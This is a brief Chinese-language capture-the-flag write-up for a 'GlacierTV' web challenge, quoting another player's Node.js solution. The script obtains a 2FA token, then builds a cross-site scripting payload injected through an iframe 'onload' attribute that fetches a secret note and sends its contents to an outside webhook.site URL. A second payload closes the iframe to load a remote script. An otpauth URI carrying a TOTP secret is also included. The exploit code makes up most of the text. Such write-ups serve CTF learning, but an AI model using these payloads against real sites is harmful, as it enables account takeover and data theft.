先放个别人的wp
const axios = require("axios");
const OTPAuth = require("otpauth");
(async () => {
try {
const response = await axios.post(
"http://127.0.0.1:8080/setup_2fa"
);
const token = OTPAuth.URI.parse(response.data.totp).generate();
const xss_payload = `fetch('/secret_note?token=${token}').then(resp => resp.text()).then(text => { new Image().src = " https://webhook.site/6f4685d1-e490-4a8c-bff7-bdea8ff722ac?data=" + btoa(text); })`;
const data = {
path: `?uri=https://www.youtube.com/%22%20onload=%22eval(atob(%27${btoa(
xss_payload
)}%27))`,
};
await axios.post("http://127.0.0.1:8080/report", data);
} catch (error) {
console.log(error);
}
})();
|
但是其实就做了两件事,第一个就是把链接粘贴到上面的栏
https://www.youtube.com?injection="></iframe><h1>1</h1><script\src="http:\/\/url"></script>
提前关闭iframe
第二个是获得token
otpauth://totp/GlacierTV:2FA?issuer=GlacierTV&secret=3W3TOVY7ENE6YNXCS2Y7SSPPQ5WHCXM4NQ5BUOZATC2GQEMHWRKQ&algorithm=SHA3-384&digits=9&period=43
用这一串可以去生成那个令牌,然后那个链接里是自己的js代码,完成xss注入
